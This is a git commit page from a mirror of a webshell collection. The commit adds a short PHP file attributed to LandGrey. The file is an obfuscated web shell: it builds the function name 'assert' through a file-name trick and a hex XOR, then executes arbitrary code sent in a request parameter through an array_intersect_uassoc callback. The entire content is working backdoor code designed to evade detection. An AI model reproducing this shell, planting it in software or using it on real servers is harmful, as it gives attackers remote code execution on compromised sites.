1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 21:01:29 +00:00

Create array_intersect_uassoc-filename-last-char-must-be-s.php

from : https://github.com/LandGrey
author :  LandGrey
This commit is contained in:
tennc
2018-06-02 15:22:09 +08:00
committed by GitHub
parent b80ff30285
commit c8ee47f1c4

View File

@@ -0,0 +1,6 @@
<?php
$password = "LandGrey";
${"LandGrey"} = substr(__FILE__,-5,-4) . "class";
$f = $LandGrey ^ hex2bin("12101f040107");
array_intersect_uassoc(array($_REQUEST[$password] => ""), array(1), $f);
?>